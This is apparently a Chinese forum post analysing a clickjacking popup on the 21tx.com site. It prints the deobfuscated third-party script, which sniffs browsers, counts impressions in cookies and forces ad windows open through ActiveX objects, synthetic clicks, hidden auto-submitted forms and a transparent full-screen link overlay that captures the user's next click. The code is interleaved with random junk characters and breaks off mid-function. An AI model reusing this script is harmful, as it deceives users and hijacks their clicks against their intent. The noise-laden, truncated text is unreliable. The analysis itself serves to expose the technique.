天星网ClickJacking点击劫持分析
# N: I0 K) q" h8 n3 s( whttp://www.21tx.com/ 天星网 ! N1 A* d9 E5 G8 h5 b' y
我得联系联系作者 ; `0 v, q! G, E1 R
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。
q0 I! b% R/ j s7 Whttp://www.lxting.com/script/popup/v1_min.js
; J! D: `4 r5 u
' z. W* F6 N3 x6 u" c这个是锁定到底JS脚本,
; X# o. X# c6 O8 L: X# T! _+ ~解密后的代码- (function() {
2 ^! p+ r4 i6 N/ }) [' ?( m - var aa_url = window.ytpp_url; * u# A$ S" {* A' [. T" N5 R
- var ua = navigator.userAgent; 4 g' W7 h5 j; a- c( b. t2 b
- var form_div = document.createElement('div');
. B) r) T5 [( Z) m9 Q. j& K - var form_pd = 0; 2 _% W# I$ ]4 W+ y" E( n
- var browser = {
6 K& @8 Z( h7 ^ - ie: /msie/i.test(ua),
$ Z T" i, g+ j- E! H5 h - ie6: /msie 6/i.test(ua),
% I: p9 L8 i( S/ m - ie7: /msie 7/i.test(ua),
* l! t3 _: x a1 \4 {( H - ie8: /msie 8/i.test(ua),
. N. |3 m; l x: Q - ie9: /msie 9/i.test(ua),
/ c9 P0 ]" X+ S - 360 : /360se/i.test(ua), 3 \3 \/ c! w3 }1 \" G9 g
- sogou: /;?se.+?MetaSr/i.test(ua), & R. U# \8 L4 e
- maxthon: /Maxthon/i.test(ua), 4 C# z3 d: j5 H+ r2 e
- tt: /TencentTraveler/i.test(ua), , e7 Z+ t9 e) N9 H6 w/ q' k- n
- ff: /firefox/i.test(ua), + m7 u: V$ N: z! N, ]
- webkit: /AppleWebKit/i.test(ua),
* I5 ]/ _+ ^+ l. {) e; E - opera: /Opera/i.test(ua),
3 `7 P; d8 r: M9 F# G2 `- I% m - qqbrowser: /QQBrowser/i.test(ua), $ v2 p3 f7 ~" y% c. g+ N) ~. Z
- cr: /chrome/i.test(ua),
5 y7 M. L- T4 B - gg: window.chrome,
0 u2 r* N0 ]; f* F' G - theworld: /Theworld/i.test(ua) 6 _0 j- a+ X2 C* y' }4 l( p0 e
- }; 1 D! M2 D8 j8 J- X1 M" ?
- var _setting = "";
) I& Y7 U9 T' h6 ~, I/ X - var _ct = 0; $ c- {# }* Q$ f. N# g$ g8 Q2 G* m
- var _le = 0;
& X# t7 N7 R* V, F - var _pd = 1; ) r2 u7 q- S, i
- var _pd2 = 0;
8 t8 Z7 v* p) d E( r- P- o - var _pc = 1;
4 G) f6 U$ z1 L9 T: V) g% f* x; r - var _pc2 = 1; / g+ r$ z8 i. S, s; Q: P7 B7 `
- var _pco = 0; ' g( c. W; X5 l5 A* N. S& ]! \: N' ~
- var _pta = 0; f- Q7 d$ w1 u9 ?% v
- var _ptb = 0;
$ [* d* \* y& Y - var _pt2a = 0;
, b: r% u' Y" M* ^/ | - var _pt2b = 0;
3 \3 B+ b: X; n, ^ - var _pt3a = 0; $ Q- ]+ T5 x( _/ l. S* b, Z
- var _pt3b = 0; 1 C6 ?) i. g) N, P& j( t) e
- var _pt4a = 0; 4 v5 [! n: B# o) |1 H; S0 P# S
- var _pt4b = 0;
! t, I" l5 A) x5 u+ v0 ? - var _pt5a = 0; ! Z; }0 ~/ R. p
- var _pt5b = 0;
; w& Y; g. d% c, O - var _pt6a = 0; % g, s: N, r( i/ {, P
- var _pt6b = 0;
5 n8 {, U8 t4 h" r4 P - var _pt7a = 0;
3 O% k2 X8 Z0 N" b - var _pt7b = 0; 5 c) G8 {1 i5 {4 \% d
- var _pt8a = 0; ! ?$ Y# ^2 F! w! z0 w( A
- var _pt8b = 0;
: @+ j, D7 I& _; N7 | - var _pt9a = 0;
2 }- O4 N; R) v: P/ \+ g - var _pt9b = 0; , H4 k$ q; ?+ {
- var _pt10a = 0; 5 z$ c! w. @8 a+ e
- var _pt10b = 0;
1 k( h* u! Q8 u' N$ Y - var _po = 0;
# y% L. o* j3 g* J& v - var _poo = 0; - P6 v& ~4 U& W6 \7 X& v/ w
- var ckn, ckt; 1 I- o" H: P# Q! {8 F
- var ads = 0; , r) g" C: y1 D0 ~0 {2 _. w
- function b(w) { ) F) H& B0 p4 @: F$ [
- var s = w + "="; 8 _4 S# ~5 p- k3 n7 c
- var r = "";
# `& a/ _' S2 H% c - var o = 0;
+ T/ I9 |% E* K. j( u5 I - var d = 0; 4 q {( y7 U) g2 |
- var p = document.cookie;
' e7 @; F d' P# J+ I) y. c! @ y - if (document.cookie.length > 0) {
4 u3 E) K- L& v1 `6 o2 Y - o = document.cookie.indexOf(s); 8 o4 X( ?+ f4 a7 ^; W
- if (o != -1) { . F7 x4 O8 |$ v: q" b
- o += s.length;
! ?: X8 ^/ g3 d# e( E - d = document.cookie.indexOf(";", o);
0 D7 @' y/ p* [7 V/ V - if (d == -1) d = document.cookie.length; ' j6 R4 A# C+ K" m0 ?* N
- r = unescape(document.cookie.substring(o, d))
% V* [) l1 }) J: o5 a7 c - }
! A4 `7 n [+ t, L - }
; E9 G5 i+ O: u - return r
$ _' ~1 j4 {$ i3 }# f2 J3 g8 V - };
* D- L+ K8 O: P8 s& u - function p(w, p, v) {
( y* T X V; w( c - var t = 30; 8 P+ D3 O; ]9 g
- try {
$ z; t% A. h/ F) A4 O! z# n9 n1 L - t = parseFloat(p) * 1
6 B- X, r V6 I - } catch(e) {
. ?/ q% {" M) {7 q - t = 30 1 i* ?( W9 J: \; K/ f0 }
- }
/ ~* O m3 |$ J - if (isNaN(t)) t = 30;
' @" d. p, X3 p7 ^% x* w - var then = new Date();
; C; p# t B4 M3 j4 }6 N - then.setTime(then.getTime() + t * 60 * 1000);
% q2 l% G; x5 M3 | K2 b9 [ - document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;': h9 ?4 W, r& Y! v
- };
3 D/ e. r7 p. h! u - function init() { . [( C; W' m6 Y. z& e
- _setting = ytpp_sti; & P( D: N4 S5 J" [& \$ V2 M
- if (getp(_setting, "CT")) {
# J4 l1 k5 P; J7 c% X7 W, _4 K - _ct = getp(_setting, "CT") # V" G1 O' x4 C; U$ t$ p
- } * N5 S" I! i8 o8 [$ B, [' Y
- if (getp(_setting, "LE")) { K% a! M. ^5 V# g# d& T' i5 p
- _le = getp(_setting, "LE")
2 B! K2 s1 W9 B! m! R - } ( v8 N" z" f$ t6 L/ L
- if (getp(_setting, "PD2")) {
8 _8 |$ `9 m& f( \* f8 K$ K - _pd2 = getp(_setting, "PD2")
7 W( b3 K5 c7 ?3 }. b - }
+ j: d* d* U2 ]: B! R - if (getp(_setting, "PC2")) {
y) W) Z; V. K* R$ S9 B O1 I( h+ j - _pc2 = getp(_setting, "PC2")
0 b2 H1 q8 X! K" g) a - }
p' N$ g/ o. v1 R - if (getp(_setting, "PCO")) {
8 H/ Q+ R! K) {/ r$ r' q+ Q - _pco = getp(_setting, "PCO") ' r4 ]; X4 v. M
- }
4 ?3 f. j7 q2 I8 e( \ - for (var i = 1; i <= 10; i++) {
* c Q1 l7 b# R" x; s7 g - var n = i == 1 ? "": i; 8 S) v7 ?+ d6 a$ m# S8 O* M, ~& N
- if (getp(_setting, "PT" + n)) {
8 x J& ^9 j! M8 @2 L9 g) t - eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');");
0 V Y: ^7 x. D, h - eval("_pt" + n + "a = _pt" + n + "[0];");
L5 ~5 D6 ~1 c0 n8 i8 Z - eval("_pt" + n + "b = _pt" + n + "[1];")
4 |0 E6 I$ \! y - }
& K& h$ X6 F" e6 z$ j' ^/ X! D - } " x. _+ c; ]6 |+ }. M3 p! L8 q% \
- if (getp(_setting, "PO")) {
2 f: Q4 ^! c0 g, D4 L; K" L( v P5 s9 S - _po = getp(_setting, "PO") + d" B3 g% V8 {8 ~
- }
1 H! @, G2 w! h8 [+ } ?/ ^ - if (getp(_setting, "POO")) { ( X" s5 T. p& g* Z
- _poo = getp(_setting, "POO") ! V- p, r0 S; m( m: I. R
- }
6 P2 V$ ?: l! v/ H/ T1 f" Y - if (_pco == 1 || _poo == 1) {
/ G' ?5 c/ W9 z - if (_poo == 1) { ( v1 p7 _% g8 k; A0 H
- _pco = 0 ) y/ ~4 c1 M- h/ Q. C) J3 e
- } else {
' d2 T0 i/ m/ ` - _poo = 0 9 Z# s; d" _9 a3 i9 x1 U% E
- }
" ~* ?) p/ D& N7 f7 r, h8 a# x - _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0;
; M: u9 ~- ~& W3 D/ F9 G - for (var i = 2; i <= 10; i++) {
! e" p; U0 p8 N! K6 V - eval("_pt" + i + "a = _pt" + i + "b = 0;") 0 ~# I# l8 v& W& {0 M
- }
; t0 j: ^/ M y - }
6 q; B, {( @6 ]" K6 L! s/ l - }; 7 ]# T% L7 ?$ D5 G
- function getp(s, p) { ' ?7 I# [8 b: j& t
- var i = s.indexOf(p + ":");
7 F/ y7 `* s1 Q5 T5 B% F# c3 o' H - if (i >= 0) { " k# t8 N$ z2 `
- return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1)
0 x2 {- A0 d; s' Z- d- _6 U& { - }
8 M' K$ }" \& c$ S - };
, r" {# L" E' N8 W+ U - function event(e, event, func, act) {
; ~' a8 C/ h" v1 p8 j3 f7 b, Y - if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func);
6 N# \% y: Z4 Z; p - else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false)
8 }: A+ C( I6 M4 x: e" ]4 K - } 3 n) r* w- ~7 t! f: r
- function pop(url, param) {
' B9 m5 U& ^* L6 t8 n - if (!document.body) { 7 a8 b$ } v% k1 v
- return setTimeout(function() {
2 A% W B. H. O% W/ \4 x. f - pop(url, param) 9 l6 z, f4 x2 {/ r: b* X
- }, * n/ Z: T& O( y, w
- 13) * K9 K, s7 T8 [6 J4 s
- } $ q( ?/ ^! p! ~1 D- A; i
- try {
( U; s: f0 P) J K+ V9 J% H2 W! Z - if (browser['cr'] && browser['gg']) { % r0 P/ @- m0 o& d }4 j! a
- try { 1 m" N" y1 J# Z: X, r4 Z5 D( }
- hrefopen(url)
- G7 U }: g3 p. C8 _: w - } catch(e) {
1 A- M4 V! O( j" u7 e# E - a_pop(url) . y0 ~' ]8 e$ A
- }
0 n+ D- P! k7 n1 _) _$ Z( f v - } else if (browser['webkit'] && browser['maxthon']) { : i8 Y3 m/ X8 o1 q- C
- if (!func(url)) { 3 W" ^' ? ?7 K" i( L
- try {
! l$ F. `$ V. y. N9 O4 r$ S2 }! ? - form_pop(url);
, h' W* w& n% c) }, B - a_pop(url)
' f1 X7 a* v1 i _. Y - } catch(e) {} , ]! o" K4 W8 i& ?9 F4 m
- } ( {5 q$ d$ W2 v1 Z; F& ~8 ]
- } else if (browser['tt']) {
# \( Y/ L( y) d2 d- P. S - try { 5 H7 }; [/ j1 M0 B% H
- object_pop(url)
; c+ F) z7 u" s f% }) ] - } catch(e) {
; f- t5 s# L0 K; N& n6 j! F, I - a_pop(url)
. A! m6 e. {) Q' n, ~* @ - } / N& ~7 R: P& W/ ]. N# j2 k
- } else if (browser['sogou']) { % k4 i4 I% K! P5 a
- if (!func(url)) {
# n4 J* `5 u1 h @6 w7 @7 t2 ~ - try {
5 D( }5 B1 l( ]% C6 ~# j5 h - a_pop(url) * B" b) U+ J5 R! a
- } catch(e) {} . s0 G8 d3 ?; C# `: [4 H. c
- }
* X4 o4 m: { |3 c8 }7 k - } else if (browser['webkit'] && browser['qqbrowser']) { 2 D/ a2 L$ ^6 Y1 D
- if (!func(url)) { 1 Q" y8 s: c6 F
- try {
: G: D, E; f$ M2 @$ m$ q( {- V - form_pop(url)
5 O$ h R' `) d - } catch(e) {
% F1 x: V& u [7 u9 \8 h& M - click_pop(url)
7 E9 u1 D1 J; U6 \- v9 L; `% s b( N - } ! P) i, Q+ z3 ~( S9 U) D& {. `
- } 7 Z4 f d- E9 O P7 J
- } else if (browser['webkit'] || browser['opera']) { + m' G8 n7 _5 P
- try {
) d# j1 M9 |; E p2 m7 \) e - form_pop(url); 2 i: A6 T3 D- U( O, ]( L& K9 o7 i
- a_pop(url)
1 v% f# h6 x/ j3 }; x - } catch(e) {}
/ b3 ?" Z; i u6 F; b: }4 b - } else if (browser['theworld'] && browser.ie6) {
! n/ j( z. p2 Z% G! g+ `# n - if (!object_pop2(url)) { % @1 F h1 i. D9 o
- a_pop(url)
" ~3 G; S" [8 C: _% r& F - }
- F0 m$ z& _: t% m7 e - } else if (browser['theworld'] && browser.ie8) { 6 l+ g9 t' i2 q3 \4 }7 v. S4 ?
- if (!func(url)) {
2 X! m0 x& O9 ] - try {
( M* v( b5 \ F - object_pop(url)
, ~" {& ~0 \! U) P3 ` - } catch(e) {
" m: b/ f& H9 X - click_pop(url)
1 p9 I& D& \4 M - }
, F% z' y/ [) n+ p. {* c - } 2 a6 @6 Y- `0 l9 x) o9 L
- } else if (browser.ie6) {
; q- c# `4 k8 d! R9 M+ e2 f - if (!func(url)) { $ u& p, ?9 T& x
- object_pop2(url) $ q/ C/ W8 t; B
- }
9 _( k& ]3 R$ V4 f; O+ G - } else if (browser.ie8) { 2 A7 w* x6 U; l5 m
- if (!func(url)) { ) C7 ]6 O. Q$ l
- try {
+ w+ W3 N7 N8 {0 N8 R! R5 |+ Y - object_pop(url)
3 [) a: t6 }3 D0 _! k- ` - } catch(e) {
; h2 ]% L4 `0 T0 v) F( V1 o! t - document.onclick = function() { 0 Z4 l, {7 w0 W" f/ v
- func(url); - f1 M0 A% l& s- ^, U5 A4 N
- document.onclick = null
9 |0 B; s5 P& E: B - } # ~- T. G( |" h: N0 O) J% t7 R, |
- }
0 }. A+ l# t( f. | - } 5 I1 g2 H! y; ~( Y/ c
- } else if (browser['ie']) {
6 ~( p1 y3 h/ A9 S- { - try { * T1 j) S/ i5 z) G5 p, n
- object_pop(url)
/ ?$ r$ \! h# R5 W8 a5 }* a- p: c - } catch(e) { 7 L& t* \$ l5 o/ k6 }. j, @
- click_pop(url) . n' i( l) t" h# S
- }
: c1 O4 `8 Y4 q1 A8 J1 V - } else if (browser['ff']) { : |, f# @" Y& t+ k) D
- if (!func(url)) {
6 i9 L" [* W6 p; I+ \ - click_pop(url) ' z9 c* @4 E9 D$ q
- } . S9 p) F: ?7 L
- } else {
& o( [ c, z, i8 z# h6 f - if (!func(url)) { . J9 c, \% R. _3 ^
- click_pop(url) / j1 a9 n: l- R3 l: Y4 A
- }
7 s$ @. [1 T9 b- b+ l# `- ~& u - }
) q4 C+ n' j! Z0 Q% X% P - } catch(e) { 8 f+ M$ e3 A2 ^1 x, E, ?: v1 j
- if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) {
' v$ |4 i4 ~6 p7 b - click_pop(url) $ E4 b" p7 i0 ? Q/ V, N
- } else { ) j0 b: R4 }" |0 k
- a_pop(url) 9 q1 v# f. k. V6 z! J1 n9 x& l! ]( s
- }
( r6 L' F1 j; ~1 ]& N& | - } " t/ B) g6 z; u+ J. R5 [$ `
- } * U4 N" \6 u3 Q" E! @
- function object_pop(url, param) {
& H6 F$ Q) {: ?% j& \: w- ~0 j - var object = document.createElement('object'); 1 n' `& l" M) {' R" V @' W
- object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'); : S. `) b' L* s1 ~
- object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; 5 A! H. R6 s) H3 D7 E* M
- append(object); ) H$ I+ c. z% Z) X
- object.launchURL(url);
& i$ v: B3 Z/ }+ h) V* l: i6 c- f& O - ads++;
4 \/ O$ N0 _4 @3 [# {5 } - p(ckn, ckt, ads)
# z6 [. m3 v; l j - } / A" m/ F$ z$ J$ ~4 e' b
- function object_pop2(url, param) {
8 s% `* g8 P$ ^5 m* d - var object2 = document.createElement('object'); / M8 l1 k& J( v% I
- object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A');
5 w3 k+ _( _2 F- A. |' M1 a - object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
0 I) Y9 ]* t' N3 ] Y - append(object2); , u, S' i' i- d$ Z& k. g# Q8 j# C
- for (var i in object2) { . j& g2 Y- z: @) e
- try { (function(o) {})(object2[i]) 0 r( R z8 O* a8 ?6 T- ?4 L. M6 K
- } catch(e) {} 2 _& \! o3 F# T$ L O& Q
- }
/ k8 Q* I# i" e! O ^ - setTimeout(function() {
/ Y( w! o$ ]" C7 C1 r# j R3 [5 m - object2.DOM.Script.open(url, '_blank', '') : ~* I. f4 {# o- a6 ^
- }, % D X" G; I3 ?6 W* k2 v
- 500); 5 A% r" n: M' f* {' {* t2 O$ O4 l
- ads++; % s n D! }) K0 `; @6 R
- p(ckn, ckt, ads)
& A% E9 _0 q2 ]& Q - }
$ G* w6 \; R* F( o2 Q - function append(e) {
- Y, y$ b3 A& V4 g$ c - for (var t in { H& ~" f( j' W5 ?5 H) x# x
- body: 1
8 H- C) |3 N6 C2 I/ M - }) {
$ j4 p5 g) b2 y - var ele = document.getElementsByTagName(t);
/ w3 r3 ]# d- o$ E+ H - for (var i = 0; i < ele.length; i++) {
! B* Y" u6 P. i" V6 R6 a, K - ele[i].insertBefore(e, ele[i].firstChild);
1 d+ N8 W0 o" ~* ~/ | - return
7 }* }, L5 ]+ I; u9 }- M* i - }
9 Y7 \! k) }* N3 y v0 e - } % b. `1 K" {/ M W, w5 f2 H
- } 1 J# f. d0 {1 [+ G- ] [
- function hrefopen(url) {
0 p$ s8 T1 x0 q' K: Z- H. N( i. O - try { . o% R) X$ J" I2 h4 g
- var c = document.createElement("a"); + {8 g$ r6 }: f; O* o: y
- c.setAttribute("href", url);
$ B D, ^1 T% W# l# F2 O2 F- I - c.setAttribute("target", "_blank"); ) @+ t+ U( n4 x9 K5 d8 ] I
- c.setAttribute("style", "display:none;"); , H2 [* B7 {, ?) X6 I6 Z! \* I
- var b = document.createEvent("MouseEvents");
! }- v" B* S& p0 B& w- `# |. }7 k - b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
: E6 {0 q" D( E' D - c.dispatchEvent(b); # g) `- o* R/ s: m- b& w
- ads++;
8 X! X0 b* i- N& ?* u - p(ckn, ckt, ads);
" e3 w( W: u: E) C C) i/ F - return true
0 c6 Z7 M4 o$ e7 x2 ` - } catch(q) { # y7 L& z+ t- d8 u1 y) B3 I
- return false; x) d9 Q9 O+ N! H0 ^& x
- }
1 Q* l) [& T6 r2 R0 B+ } - } 2 Q3 X3 a9 L+ K
- function form_pop(url) {
- L( E) b: H8 q ^# w - form_div.setAttribute('id', '__unionsky_push_d_object_box__'); 6 Z: s* D5 G7 O! {3 [( k
- form_div.setAttribute('style', 'display:none'); $ h- O. R/ {$ @ Q0 }4 V6 u! ?
- var form = document.createElement('form'); 0 X9 F; g, d6 z. e5 }. `
- form.setAttribute('action', aa_url); $ T% g9 B3 x" p3 H0 P5 `
- form.setAttribute('method', 'post'); ( V- q+ |8 m/ R0 S2 Z
- form.setAttribute('name', '__unionsky_push_d_form_box__'); 2 r) |! Y/ `$ E! |4 Z% N
- form.setAttribute('target', '_blank'); ( W, ~5 p8 A* ?$ Y$ U9 C9 h2 f
- form.setAttribute('style', 'display:none'); : i' Y8 i& b! \! B0 [4 n" g& o1 {
- var sinput = document.createElement('input'); % w4 c6 ]" i+ \/ A' M$ ^1 _& L/ U% _
- sinput.setAttribute('style', 'display:none'); 8 Y9 y6 _3 H' G, g" |, X
- sinput.setAttribute('type', 'submit');
& A' L/ c: c0 s. F* R' ~! y& L% W* Z - sinput.setAttribute('id', '_sumit_2app'); # c6 J& H8 n6 a% z5 }3 k2 x; t
- form.appendChild(sinput); ' s4 p, h* m/ T# s6 s8 i
- form_div.appendChild(form);
# p: l/ P6 @) B; G$ ~2 x - append(form_div); 0 N1 B5 k9 K( f& [1 ?- r2 M
- var unionsky_from = document.forms["__unionsky_push_d_form_box__"]; 7 ^- |6 F$ B6 C: G# M$ g/ g
- try {
2 A2 E4 q, h7 x% F - document.getElementById("_sumit_2app").click()
3 V, A# Q& c$ N3 d) W) P - } catch(e) { ' r* \: u N8 F" S) ]
- event(document, 'keyup', ( i! w% J2 o8 e6 f1 j: M
- function(e) { - K6 R0 e. G, T2 M/ u
- if (document.getElementById('__unionsky_push_d_object_box__') == null) { ! k7 h( ^8 s! H0 ?9 y! X
- return9 b1 D& C* l2 Y
- }; 6 h# K3 f! w" ?- P
- e = e || window.event; 3 _$ w8 @" ~6 D% w
- e.canceBubble = true;
. y/ y4 e! B6 H/ Q - event(document, 'keyup', arguments.callee, true);
0 e; \4 z" Q; b8 ?) m, A" B - form_pd = 1; # x/ v& p8 o; M' \
- unionsky_from.submit() & {8 r8 Z: m# H3 ^" X/ i2 a! b
- }) 6 F9 {& N& i, `% Q
- } 3 V5 j1 g) p3 |: v
- };
]9 P4 H: R% k' _- o - function click_pop(url, param) { 7 Y$ a! a, t, [9 q- M8 s
- event(document, 'mouseup', 9 A: N) |0 \ F( p i# j; l3 d6 T
- function(e) { ) m. K: G; g0 W* b! A
- e = e || window.event; ( l* t! w1 S2 X9 ^- Y
- e.canceBubble = true; 3 C' D; q: R( ~
- event(document, 'mouseup', arguments.callee, true); - V6 m B& e* U. \8 q) ~; _ n
- func(url, param); % j! t4 ]3 x: C& o1 y' P
- ads++;
9 R9 g+ m8 W) M, g+ D+ r - p(ckn, ckt, ads)
' @7 A! u6 E, N7 I - })
, d) M# D4 Z( `, j8 @6 C) ^& t) P8 y - }; & G$ I* ]& w" p( r6 m# \- |
- function a_pop(url) {
* p: _# d- H, y - if (ytpp_plid == 166028) { / O* P! N$ C$ f
- return5 {$ z1 N+ R I" t) T/ A
- } , M+ {, T% F1 E2 i9 ~! l
- if (!document.body) { ; D6 @+ T" O" L; l9 y! X
- return setTimeout(function() {
- y& T' m; F, S# p) l - a_pop(url) * L8 P1 E- e- u
- },
4 P6 n' }" h3 q6 |: O6 ?; } - 13)
6 Z7 P5 w" y. p: h$ P - }
0 r' O) r. ]( t/ _0 j% C! g$ Y - var a = document.createElement("a");
% l& H8 C" E& F8 r" w4 Z# f9 o - a.href = url;
2 a0 C# Z; \) Y2 E: ~+ Q - a.target = "_blank"; ( k2 Q# U3 @9 a! e/ A
- var div = document.createElement('div');
E3 z6 A- M9 I1 e. m9 K0 z - div.style.backgroundColor = '#fff'; + h* U g# D2 k$ y) [, G
- a.appendChild(div); # r6 l- A9 @5 f: p7 k& i
- append(a);
3 \$ V& _/ Z6 c. A - var as = a.style;
$ W9 O$ Q; C/ G5 C/ u - as.position = "absolute"; # \8 @& }8 C. l* E9 R
- as.zIndex = '2147483647'; - l5 J4 _" r: e0 ], y2 l
- as.display = "block"; i7 S; X- y; }& X. J& F. v1 {
- as.top = "0px"; f8 E5 t6 k( y |# N8 C- l
- as.left = "0px";
" \5 Q3 s8 V- e# g& J7 f3 g% C - as.cursor = 'default';
& Z- A. A% U1 O3 Y" \: n - as.opacity = "0"; n n- V5 O& J V8 u
- as.filter = "alpha(opacity:0)";
. m0 d# d; @& B* { - var m = setInterval(function() {
; e5 g( `8 z7 G' B: e, f1 k3 N - if (form_pd == 1) {
, o" l: s% m" {- C" t - a.parentNode.removeChild(a);
4 Q ~) U: R% ^9 L - clearInterval(m); . ^% B/ v+ U. _% w* V
- return6 v! ]& d# H! K7 Y# r& t
- } * s4 L3 G3 Q, c
- a.style.zIndex = '2147483647';
6 y" ~$ X/ ]7 z' X - var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body; 9 f( k/ Z( c9 L' L
- a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
& q' V$ s% |7 d* Y - div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px'; 6 q; R) ^# K8 g9 _$ X0 }6 F
- div.style.height = d.clientHeight + 'px';
/ ]' ]4 g+ w- a! P8 f' Y" { - if (browser['ie']) { $ x+ ]3 ]' j0 X) O
- try { 4 l" a1 x0 C+ p
- var divs = document.body.childNodes; " [* L9 E9 d. \: F5 e, w
- for (var i = 0; i < divs.length; i++) { 6 Y/ e' L" Q& J
- if (!divs[i]['style']) { 3 ?! F; b+ i( I$ s, s9 c6 T
- continue
! Q+ l, k- C% h: I! J$ B' V' l; a6 o - }
; H4 y: S; C! Y1 p: Y4 j- j - var _i = parseInt(divs[i].style.zIndex); 2 j! W% g2 Z1 D- v
- if (_i && divs[i] != a && _i == 2147483647) { ' G/ m: C/ C6 L" g8 [
- divs[i].style.zIndex = _i - 1 ) L, c5 K; c& Z# K
- }
2 z. `* a* f) f' V! b - } . B! N1 _" _9 f' F9 ?
- a.style.zIndex = '2147483647'
1 V' B! W* X' L0 u' a - } catch(e) {}
; R2 r! b, e; c - }
7 `; }1 r) E! X - }, , w8 Y" r% M8 I% R
- 120); $ l& M. p' }: A; A* w: ]8 {9 U
- a.onclick = function(e) { : ~6 V' l6 {" [& ^1 ]( a
- if (document.getElementById('__unionsky_push_d_object_box__') != null) {
0 W7 f' y! m) z5 C! c% @ ` - form_div.parentNode.removeChild(form_div) / G* s# {0 H! x4 f; B+ A1 F! c6 e
- }
+ S. t0 M4 @5 r9 K - e = e || window.event; " A8 M+ z& X. m9 |5 J7 Y
- e.cancelBubble = true; . W3 x- \. _2 e }
- setTimeout(function() {
) `9 k: y5 c5 y' F/ e2 d# p - a.parentNode.removeChild(a)
1 {1 K7 w( k' A - },
8 j" A8 r4 Z$ r$ U5 H1 f* C - 200);
9 P4 L; w8 ~5 F - clearInterval(m);
6 V X D8 a2 Z - ads++; 4 i7 g: C8 I6 u$ n
- p(ckn, ckt, ads)
9 [' O4 Y4 Q/ g) P. `1 ~8 k' j - };
( X& |! I& U- M& [3 e - event(a, 'mouseup',
4 o3 m# O6 p5 `, U; Z% P& _ - function(e) {
6 m: F2 l2 `' J+ \9 ]: r - e = e || window.event; Z5 _( F! |$ n: e* b8 Z
- e.cancelBubble = true
5 B' \" ]% U- c2 b9 K* P' A - }) 5 D4 k& Q* n8 T! a7 f, a8 W) j$ v
- } ; Y0 ~1 \ \# u: X0 S, K! J
- function func(url, param) { 7 @- L$ h5 x: B% q/ E
- var f = window[String.fromCharCode(111, 112, 101, 110)];
, f D" K) Y1 O' i% k/ g: r4 N: y - var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height); d/ w( ?! T, N
- if (w) { ! o& l# C' e0 \ H* V: P3 P
- ads++; & V/ k, p; p# K6 D7 ?+ @
- p(ckn, ckt, ads)
; p3 f5 q4 D$ V! k - }; 4 f: L9 `$ a9 R. B
- return w
6 {3 S- N6 r4 x2 G9 Z+ ? - }
+ @$ B$ p \9 V% A+ V - function fstart(url) {
3 C2 T1 Y2 i. K - init();
* u( t6 C7 q/ Y. [4 ~2 b4 R; h - if (_ct >= 0) { Y; T9 A; W+ ~8 O6 h: E
- ckn = "YITIAN_NUM";
0 V- t5 D* ?) C- k - ckt = _ct , F4 e4 r4 z0 g5 l# m/ ]. M7 d
- } else {
' o2 E# Z; F; X: n% a) G) g - ckn = "YITIAN_ALL";
2 a2 f, g9 ^* X+ L- ]6 B3 f5 s/ D - ckt = Math.abs(_ct)
! @) `/ c b% A - } : S7 q3 c1 n1 w. o$ o9 N
- if (ckt > 0) { / P% n' f; k3 j7 @0 a
- if (b(ckn)) { $ [8 {, o: @9 j8 q/ `3 D
- try {
# Z+ q7 Q! ^8 p+ o' {- { - ads = parseFloat(b(ckn)) $ }1 Q9 _) |' V/ K1 n$ i; Z* g
- } catch(q) {} + k7 T( O) c. k
- }
8 x$ T. d( t, O' O0 S" ^7 H7 V' Y% Z, f( G - } : V7 g& P/ F9 J
- if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { T2 v* ^) G5 f
- return
' L+ F$ T9 r( t- z2 z8 J9 w - } else { % f1 R- X# ]% A
- if (_le > 0) { : }* x, X% @# @) ?% h1 E
- setTimeout(go(url), _le * 1000) 3 B. e, { h r' K) n
- } else { ( ^9 A, g2 q/ n7 ~, u* I' z& b
- go(url)
& ^( O- M3 S8 w% O - }
) Q L2 b {" e' Y( Z+ P) t- O - }
/ I" g0 p% g1 \3 b- z, t2 c$ x2 R6 a - } - B* e4 W/ D. t1 F c
- function go(url) { , e0 V% i+ @, }! Q+ p: Y; h$ N
- if (_poo == 1) { 7 @/ q2 r j1 m3 @6 U
- try {
% s' P5 P @9 O/ D x$ ~- V1 x - func(url)
% l1 Q: \) p2 t9 K - } catch(q) {}
3 [6 j |4 {2 c& ?$ I- u* ^+ X3 \1 r - } else if (_pco == 1) { 7 V& ]) `/ v/ c7 b
- a_pop(url)
6 X1 `- n2 b+ Z5 M - } else { 0 @; i4 [0 A& |' v7 I# X" G n
- if (_pd == 1) {
0 p, o# S. h Q2 }" t - setTimeout(function() { 0 i5 ^3 Y1 J% Y0 }2 c: ~
- pop(url, { % A/ K* }; O6 y3 U
- a: 1,
# s: t" T n5 g/ ^7 c - b: 2 # m, @4 r* X! \2 G* j" _
- }) . A1 c6 Z6 M5 K* s
- },
0 V' S1 g( V5 c - 300)
& b, @2 p" X% I+ ] - }
# Y3 X1 r8 x- v1 Y- B! t5 Z% v - if (_pd2 > Math.random()) {
& Z+ E' A6 P& f( x! I - setTimeout(function() { 8 m. N+ y: k' ]% W& d
- pop(url, {
8 ^ x. j" g* H2 m$ E - a: 1, , |5 Q2 |/ T& a% s
- b: 2 + a2 h5 c; u8 g* n2 d7 Q! H
- }) $ B9 ~& h' m) O0 O7 U& s% A7 p
- },
